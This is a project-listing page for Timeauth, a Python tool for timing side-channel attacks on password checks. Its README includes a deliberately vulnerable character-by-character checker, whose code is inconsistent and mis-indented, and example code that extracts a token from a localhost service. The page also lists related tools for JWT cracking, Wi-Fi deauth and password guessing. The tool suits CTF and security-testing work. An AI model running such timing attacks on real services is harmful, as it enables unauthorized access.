Timeauth

Python Time Based Authentication Attack Tool
Alternatives To Timeauth
Project NameStarsDownloadsRepos Using ThisPackages Using ThisMost Recent CommitTotal ReleasesLatest ReleaseOpen IssuesLicenseLanguage
Zen Rails Security Checklist1,632
3 years ago1mitRuby
Checklist of security precautions for Ruby on Rails applications.
Tinc1,532
10 months ago63otherC
a VPN daemon
Fwknop875
4 months ago110gpl-2.0Perl
Single Packet Authorization > Port Knocking
Nginx Lua Anti Ddos649
6 months ago37mitLua
A Anti-DDoS script to protect Nginx web servers using Lua with a HTML Javascript based authentication puzzle inspired by Cloudflare I am under attack mode an Anti-DDoS authentication page protect yourself from every attack type All Layer 7 Attacks Mitigating Historic Attacks DoS DoS Implications DDoS All Brute Force Attacks Zero day exploits Social Engineering Rainbow Tables Password Cracking Tools Password Lists Dictionary Attacks Time Delay Any Hosting Provider Any CMS or Custom Website Unlimited Attempt Frequency Search Attacks HTTP Basic Authentication HTTP Digest Authentication HTML Form Based Authentication Mask Attacks Rule-Based Search Attacks Combinator Attacks Botnet Attacks Unauthorized IPs IP Whitelisting Bruter THC Hydra John the Ripper Brutus Ophcrack unauthorized logins Injection Broken Authentication and Session Management Sensitive Data Exposure XML External Entities (XXE) Broken Access Control Security Misconfiguration Cross-Site Scripting (XSS) Insecure Deserialization Using Components with Known Vulnerabilities Insufficient Logging & Monitoring Drupal WordPress Joomla Flash Magento PHP Plone WHMCS Atlassian Products malicious traffic Adult video script avs KVS Kernel Video Sharing Clip Bucket Tube sites Content Management Systems Social networks scripts backends proxy proxies PHP Python Porn sites xxx adult gaming networks servers sites forums vbulletin phpbb mybb smf simple machines forum xenforo web hosting video streaming buffering ldap upstream downstream download upload rtmp vod video over dl hls dash hds mss livestream drm mp4 mp3 swf css js html php python sex m3u zip rar archive compressed mitigation code source sourcecode chan 4chan 4chan.org 8chan.net 8ch 8ch.net infinite chan 8kun 8kun.net anonymous anon tor services .onion torproject.org nginx.org nginx.com openresty.org darknet dark net deepweb deep web darkweb dark web mirror vpn reddit reddit.com adobe flash hackthissite.org dreamhack hack hacked hacking hacker hackers hackerz hackz hacks code coding script scripting scripter source leaks leaked leaking cve vulnerability great firewall china america japan russia .gov government http1 http2 http3 quic q3 litespeedtech litespeed apache torrents torrent torrenting webtorrent bittorrent bitorrent bit-torrent cyberlocker cyberlockers cyber locker cyberbunker warez keygen key generator free irc internet relay chat peer-to-peer p2p cryptocurrency crypto bitcoin miner browser xmr monero coinhive coin hive coin-hive litecoin ethereum cpu cycles popads pop-ads advert advertisement networks banner ads protect ovh blazingfast.io amazon steampowered valve store.steampowered.com steamcommunity thepiratebay lulzsec antisec xhamster pornhub porn.com pornhub.com xhamster.com xvideos xvdideos.com xnxx xnxx.com popads popcash cpm ppc
Lyncsmash279
a year ago1Python
locate and attack Lync/Skype for Business
Jwtcat258
5 months ago1apache-2.0Python
A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner.
Query Auth1491124 years ago13August 19, 20134otherPHP
Signature generation and validation for REST API query authentication
Esp8266 Deauth121
6 years ago4mitArduino
Multi target De-Auth attack implementation for ESP8266 module.
Pywarp7512 months ago3January 02, 20194apache-2.0Python
Python WebAuthn Relying Party library
Bruteloops68118 days ago8March 15, 20221mitPython
Protocol agnostic online password guessing API.
Alternatives To Timeauth
Select To Compare


Alternative Project Comparisons
Readme

Time Authentication Attack Tool

Python Time Based Authentication Attack Tool

Development

You can contribute by sending merge requests and/or issues on this github opensource project.

Demo:

asciicast

Usage:

Installation

You can install this package by launching:

> git clone [email protected]:SakiiR/timeauth.git
[...]
> pip install ./timeauth/
> # Done

Examples

Suppose that we have a listenning tcp service on localhost:1337 waiting for a password input. What if the code behind this TCP service have been done by a weird developer and checks your input char by char and sleeping each time it checks your char ( or do a BIG action on his server that take some time ).

> nc localhost 1337
Hello !
password please: SakiiR
Bad Password ! BYE BYE
[!] Closed connection ..

And the following backend password verification:

def check_password(input, real):
    if(len(input_flag) == 0):
            return False
        for left, right in zip_longest(input_flag, flag):
            if(left != right):
                return False
            sleep(0.25) # prevent brute forcing
        return True

This package has been made to make exploitation of this kind of service faster by implementating a Single Class.

exemple:

from pwn import remote, context
from timeauth import TimeAuthChecker


class ExampleChecker(TimeAuthChecker):

    def __init__(self):
        super(self.__class__, self).__init__(
            charset="0123456789",
            token_length=10,
            hidden_char="*"
        )

    def request(self):

        context.log_level = 'error'
        s = remote('localhost', 1337)
        s.recvuntil(':')
        s.sendline(self.get_token())
        s.readall()
        s.close()
        context.log_level = 'info'

if __name__ == "__main__":
    a = ExampleChecker()
    a.process()
    a.print_token()

Todo

  • Add a Time Based SQL Injection Module
  • Add a Blind SQL Injection Module
Popular Attack Projects
Popular Authentication Projects
Popular Security Categories
Related Searches

Get A Weekly Email With Trending Projects For These Categories
No Spam. Unsubscribe easily at any time.
Python
Authentication
Time
Tcp
Attack
Penetration Testing